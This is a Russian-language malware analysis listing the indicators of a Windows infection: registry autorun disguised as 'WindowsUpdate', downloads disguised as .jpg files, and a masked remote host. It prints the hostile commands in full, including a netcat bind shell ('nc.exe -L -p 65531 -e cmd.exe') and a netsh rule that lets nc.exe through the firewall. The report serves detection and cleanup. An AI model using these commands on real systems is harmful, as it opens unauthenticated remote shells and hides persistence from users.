Техническая информация
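- [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'WindowsUpdate' = '<SYSTEM32>\nc.exe' (автозапуск nc.exe при входе пользователя в систему; имя параметра 'WindowsUpdate' маскирует запись под обновление Windows)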
- C:\try.exe
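- <SYSTEM32>\nc.exe -L -p 65531 -e cmd.exe (nc.exe постоянно прослушивает порт 65531 и передаёт подключившемуся cmd.exe, то есть открывает удалённую командную оболочку без аутентификации; слушающий сокет nc.exe на этом порту — признак заражения)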
- C:\try.exe (загружен из сети Интернет)
- <SYSTEM32>\nc.exe (загружен из сети Интернет)
- <SYSTEM32>\ipconfig.exe /flushdns
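- <SYSTEM32>\netsh.exe firewall add allowedprogram <SYSTEM32>\nc.exe 1 ENABLE (вносит nc.exe в список разрешённых программ брандмауэра Windows, поэтому входящие подключения к нему не блокируются; при очистке системы это исключение нужно удалить)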
- %WINDIR%\wget.exe
- %HOMEPATH%\Local Settings\Temporary Internet Files\Content.IE5\2VAZY7AN\pega[1].jpg
- C:\try.exe
- %HOMEPATH%\Local Settings\Temporary Internet Files\Content.IE5\U98D4X8H\wget[1].jpg
- %HOMEPATH%\Local Settings\Temporary Internet Files\Content.IE5\KHMHGZ4F\contador[1].php
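- %HOMEPATH%\Local Settings\Temporary Internet Files\Content.IE5\KHMHGZ4F\nc[1].jpg (судя по совпадению имён с nc.exe и wget.exe, под расширением .jpg, по-видимому, загружаются исполняемые файлы, а не изображения)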
- <SYSTEM32>\nc.exe
- '21#.#05.6.172':80
- 'localhost':1038
- 21#.#05.6.172/image1/wget.jpg
- 21#.#05.6.172/image1/pega.jpg
- 21#.#05.6.172/image1/contador.php?os#############################################
- 21#.#05.6.172/image1/nc.jpg
- ClassName: 'Shell_TrayWnd' WindowName: ''
- ClassName: 'MS_WebcheckMonitor' WindowName: ''
- ClassName: 'MS_AutodialMonitor' WindowName: ''